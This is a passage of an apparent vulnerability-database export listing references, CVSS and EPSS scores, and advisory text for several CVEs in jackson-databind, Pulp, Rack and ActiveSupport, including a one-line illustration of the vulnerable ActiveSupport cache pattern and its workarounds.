url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9547
3
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
4
reference_url https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2
5
reference_url https://github.com/FasterXML/jackson-databind/issues/2634
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/issues/2634
6
reference_url https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E
7
reference_url https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1@%3Cnotifications.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1@%3Cnotifications.zookeeper.apache.org%3E
8
reference_url https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a@%3Cnotifications.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a@%3Cnotifications.zookeeper.apache.org%3E
9
reference_url https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E
10
reference_url https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E
11
reference_url https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E
12
reference_url https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6@%3Cnotifications.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6@%3Cnotifications.zookeeper.apache.org%3E
13
reference_url https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E
14
reference_url https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab@%3Cnotifications.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab@%3Cnotifications.zookeeper.apache.org%3E
15
reference_url https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc@%3Cdev.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc@%3Cdev.zookeeper.apache.org%3E
16
reference_url https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E
17
reference_url https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E
18
reference_url https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E
19
reference_url https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428@%3Cnotifications.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428@%3Cnotifications.zookeeper.apache.org%3E
20
reference_url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
21
reference_url https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html
22
reference_url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
23
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-9547
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-9547
24
reference_url https://security.netapp.com/advisory/ntap-20200904-0006
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20200904-0006
25
reference_url https://security.netapp.com/advisory/ntap-20200904-0006/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20200904-0006/
26
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2021.html
27
reference_url https://www.oracle.com/security-alerts/cpujul2020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujul2020.html
28
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
29
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2021.html
30
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1816337
reference_id 1816337
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1816337
31
reference_url https://github.com/advisories/GHSA-q93h-jc49-78gg
reference_id GHSA-q93h-jc49-78gg
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-q93h-jc49-78gg
32
reference_url https://access.redhat.com/errata/RHSA-2020:1644
reference_id RHSA-2020:1644
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1644
33
reference_url https://access.redhat.com/errata/RHSA-2020:2067
reference_id RHSA-2020:2067
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2067
34
reference_url https://access.redhat.com/errata/RHSA-2020:2333
reference_id RHSA-2020:2333
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2333
35
reference_url https://access.redhat.com/errata/RHSA-2020:2511
reference_id RHSA-2020:2511
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2511
36
reference_url https://access.redhat.com/errata/RHSA-2020:2512
reference_id RHSA-2020:2512
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2512
37
reference_url https://access.redhat.com/errata/RHSA-2020:2513
reference_id RHSA-2020:2513
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2513
38
reference_url https://access.redhat.com/errata/RHSA-2020:2515
reference_id RHSA-2020:2515
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2515
39
reference_url https://access.redhat.com/errata/RHSA-2020:2813
reference_id RHSA-2020:2813
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2813
40
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
41
reference_url https://access.redhat.com/errata/RHSA-2020:3196
reference_id RHSA-2020:3196
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3196
42
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
43
reference_url https://access.redhat.com/errata/RHSA-2020:3779
reference_id RHSA-2020:3779
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3779
44
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
45
reference_url https://access.redhat.com/errata/RHSA-2025:1746
reference_id RHSA-2025:1746
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1746
46
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2020-9547, GHSA-q93h-jc49-78gg
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ruae-hqdg-m7ek
64
url VCID-sg6x-y34w-37bc
vulnerability_id VCID-sg6x-y34w-37bc
summary pulp: sensitive credentials revealed through the API
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
url https://access.redhat.com/errata/RHSA-2018:2927
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1090.json
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1090.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-1090
reference_id
reference_type
scores
0
value 0.00274
scoring_system epss
scoring_elements 0.50772
published_at 2026-04-01T12:55:00Z
1
value 0.00274
scoring_system epss
scoring_elements 0.50869
published_at 2026-04-13T12:55:00Z
2
value 0.00274
scoring_system epss
scoring_elements 0.50866
published_at 2026-04-09T12:55:00Z
3
value 0.00274
scoring_system epss
scoring_elements 0.50907
published_at 2026-04-11T12:55:00Z
4
value 0.00274
scoring_system epss
scoring_elements 0.50886
published_at 2026-04-12T12:55:00Z
5
value 0.00274
scoring_system epss
scoring_elements 0.50828
published_at 2026-04-02T12:55:00Z
6
value 0.00274
scoring_system epss
scoring_elements 0.50853
published_at 2026-04-04T12:55:00Z
7
value 0.00274
scoring_system epss
scoring_elements 0.50811
published_at 2026-04-07T12:55:00Z
8
value 0.00274
scoring_system epss
scoring_elements 0.50868
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-1090
3
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1090
reference_id
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1090
4
reference_url https://pulp.plan.io/issues/3521
reference_id
reference_type
scores
url https://pulp.plan.io/issues/3521
5
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1560035
reference_id 1560035
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1560035
6
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:pulpproject:pulp:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:pulpproject:pulp:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:pulpproject:pulp:*:*:*:*:*:*:*:*
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:-:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:-:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:-:*:*:*:*:*:*:*
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-1090
reference_id CVE-2018-1090
reference_type
scores
0
value 5.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:P/I:N/A:N
1
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
2
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://nvd.nist.gov/vuln/detail/CVE-2018-1090
fixed_packages
aliases CVE-2018-1090
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sg6x-y34w-37bc
65
url VCID-sw69-1r7d-kkht
vulnerability_id VCID-sw69-1r7d-kkht
summary 
Uncontrolled Resource Consumption
There is a possible DoS vulnerability in the multipart parser in Rack. Specially crafted requests can cause the multipart parser to enter a pathological state, causing the parser to use CPU resources disproportionate to the request size.
references
0
reference_url https://access.redhat.com/errata/RHSA-2019:3172
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3172
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-16470.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-16470.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-16470
reference_id
reference_type
scores
0
value 0.00177
scoring_system epss
scoring_elements 0.39267
published_at 2026-04-13T12:55:00Z
1
value 0.00177
scoring_system epss
scoring_elements 0.39117
published_at 2026-04-01T12:55:00Z
2
value 0.00177
scoring_system epss
scoring_elements 0.39303
published_at 2026-04-02T12:55:00Z
3
value 0.00177
scoring_system epss
scoring_elements 0.39327
published_at 2026-04-04T12:55:00Z
4
value 0.00177
scoring_system epss
scoring_elements 0.39241
published_at 2026-04-07T12:55:00Z
5
value 0.00177
scoring_system epss
scoring_elements 0.39296
published_at 2026-04-08T12:55:00Z
6
value 0.00177
scoring_system epss
scoring_elements 0.39312
published_at 2026-04-09T12:55:00Z
7
value 0.00177
scoring_system epss
scoring_elements 0.39324
published_at 2026-04-11T12:55:00Z
8
value 0.00177
scoring_system epss
scoring_elements 0.39285
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-16470
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/rack/rack
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rack/rack
5
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2018-16470.yml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2018-16470.yml
6
reference_url https://groups.google.com/forum/#!msg/rubyonrails-security/U_x-YkfuVTg/xhvYAmp6AAAJ
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!msg/rubyonrails-security/U_x-YkfuVTg/xhvYAmp6AAAJ
7
reference_url https://groups.google.com/forum/#!topic/ruby-security-ann/Dz4sRl-ktKk
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!topic/ruby-security-ann/Dz4sRl-ktKk
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1646814
reference_id 1646814
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1646814
9
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=913003
reference_id 913003
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=913003
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-16470
reference_id CVE-2018-16470
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-16470
11
reference_url https://github.com/advisories/GHSA-hg78-4f6x-99wq
reference_id GHSA-hg78-4f6x-99wq
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hg78-4f6x-99wq
fixed_packages
aliases CVE-2018-16470, GHSA-hg78-4f6x-99wq
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sw69-1r7d-kkht
66
url VCID-t684-yp58-hkg8
vulnerability_id VCID-t684-yp58-hkg8
summary 
ActiveSupport potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore
In ActiveSupport, there is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when
untrusted user input is written to the cache store using the `raw: true` parameter, re-reading the result
from the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like:

```
data = cache.fetch("demo", raw: true) { untrusted_string }
```
Versions Affected:  rails < 5.2.5, rails < 6.0.4
Not affected:       Applications not using MemCacheStore or RedisCacheStore. Applications that do not use the `raw` option when storing untrusted user input.
Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
  
Impact
------
Unmarshalling of untrusted user input can have impact up to and including RCE. At a minimum,
this vulnerability allows an attacker to inject untrusted Ruby objects into a web application.
In addition to upgrading to the latest versions of Rails, developers should ensure that whenever
they are calling `Rails.cache.fetch` they are using consistent values of the `raw` parameter for both
reading and writing, especially in the case of the RedisCacheStore which does not, prior to these changes,
detect if data was serialized using the raw option upon deserialization.

Workarounds
-----------
It is recommended that application developers apply the suggested patch or upgrade to the latest release as
soon as possible. If this is not possible, we recommend ensuring that all user-provided strings cached using
the `raw` argument should be double-checked to ensure that they conform to the expected format.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00031.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00031.html
1
reference_url http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00034.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00034.html
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8165.json
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8165.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8165
reference_id
reference_type
scores
0
value 0.90128
scoring_system epss
scoring_elements 0.99586
published_at 2026-04-04T12:55:00Z
1
value 0.90128
scoring_system epss
scoring_elements 0.99588
published_at 2026-04-13T12:55:00Z
2
value 0.90128
scoring_system epss
scoring_elements 0.99584
published_at 2026-04-01T12:55:00Z
3
value 0.90128
scoring_system epss
scoring_elements 0.99585
published_at 2026-04-02T12:55:00Z
4
value 0.90128
scoring_system epss
scoring_elements 0.99587
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8165
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
5
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
6
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
7
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
8
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
9
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
10
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
11
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activesupport/CVE-2020-8165.yml
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activesupport/CVE-2020-8165.yml
12
reference_url https://groups.google.com/forum/#!topic/rubyonrails-security/bv6fW4S0Y1c
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements
1
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!topic/rubyonrails-security/bv6fW4S0Y1c
13
reference_url https://groups.google.com/g/rubyonrails-security/c/bv6fW4S0Y1c
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
